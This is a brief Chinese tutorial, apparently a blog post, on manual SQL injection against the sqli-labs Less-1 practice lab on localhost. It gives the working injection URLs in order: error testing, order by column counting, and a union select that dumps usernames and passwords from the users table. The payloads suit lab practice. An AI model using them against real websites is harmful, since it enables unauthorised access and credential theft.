1、通过 http://127.0.0.1/sqli/Less-1/?id=1' 报错 说明存在注入
2、通过http://127.0.0.1/sqli/Less-1/?id=1' order by 10000 -- +判断闭合字符 为 ‘
3.使用http://127.0.0.1/sqli/Less-1/?id=1' order by 10000 -- + 二分法来判断列数
4.判断显示位
5.通过命令http://127.0.0.1/sqli/Less-1/?id=1' and 1=2 union select 1,group_concat(username),group_concat(password) from users -- +查看字段内容
欢迎分享,转载请注明来源:内存溢出
评论列表(0条)